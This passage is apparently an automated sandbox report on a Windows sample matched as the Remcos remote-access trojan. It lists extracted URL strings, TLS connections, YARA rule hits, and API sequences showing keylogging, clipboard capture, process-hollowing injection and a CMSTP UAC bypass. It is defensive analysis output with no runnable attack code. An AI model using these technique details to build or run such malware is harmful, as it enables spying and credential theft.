00000003.00000003.2170063050.00004C38014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2245187884.00006B3C022E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2171876378.00004C3801620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2171388549.00004C38015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 
00000003.00000003.2171818615.00004C380161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2170824400.00004C380156C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                      Source: chrome.exe, 00000003.00000003.2170063050.00004C38014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-join.fastly-edge.com/http
                      Source: chrome.exe, 00000003.00000003.2244445247.00006B3C022D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244558634.00006B3C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244591281.00006B3C022E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244520622.00006B3C022D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2244408627.00006B3C022CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromeupboarding-pa.googleapis.com2
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromeupboarding-pa.googleapis.com2P
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2416400031.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: chrome.exe, 00000003.00000003.2142435118.000049C4002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2142417963.000049C4002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                      Source: chrome.exe, 00000003.00000003.2205215745.00006B3C006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2196728401.00006B3C006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2227862312.00006B3C00D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2198998685.00006B3C006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2200768060.00006B3C006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2198486072.00006B3C006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2195846285.00006B3C00438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: chrome.exe, 00000003.00000003.2202030079.00006B3C00EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-autofill.googleapis.com/b-
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000003.00000003.2203475326.00006B3C00FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                      Source: chrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000003.00000003.2197208210.00006B3C00770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                      Source: chrome.exe, 00000003.00000003.2234448927.00006B3C01C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                      Source: chrome.exe, 00000003.00000003.2234448927.00006B3C01C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                      Source: chrome.exe, 00000003.00000003.2156788730.00004C3800F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardL8
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                      Source: chrome.exe, 00000003.00000003.2234448927.00006B3C01C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardk
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                      Source: chrome.exe, 00000003.00000003.2150549322.00004C3800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                      Source: chrome.exe, 00000003.00000003.2230851386.00006B3C01240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe String found in binary or memory: https://login.yahoo.com/config/login
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe String found in binary or memory: https://www.google.com
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49853 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50011 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50069 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50070 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50071 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50072 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50073 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 0_2_004099E4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_004159C6
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040987A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 4_2_004098E2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 5_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 5_2_00406DFC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 5_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 5_2_00406E9F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 6_2_004068B5
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe Code function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 6_2_004072B5
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_00409B10
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041BB87 SystemParametersInfoW,0_2_0041BB87

                      System Summary

                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,0_2_00417245
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041ACD1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle,0_2_0041ACFD
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_10006FA0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,0_2_10006FA0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040DD85
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00401806 NtdllDefWindowProc_W,4_2_00401806
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004018C0 NtdllDefWindowProc_W,4_2_004018C0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004016FD NtdllDefWindowProc_A,5_2_004016FD
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 5_2_004017B7 NtdllDefWindowProc_A,5_2_004017B7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00402CAC NtdllDefWindowProc_A,6_2_00402CAC
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00402D66 NtdllDefWindowProc_A,6_2_00402D66
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004158B9
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2142170096.0000000000880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2141868977.0000000003281000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4572439462.000000000287B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2175471606.0000000003343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2142046226.000000000082C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2147322433.0000000000804000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: OriginalFileName vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
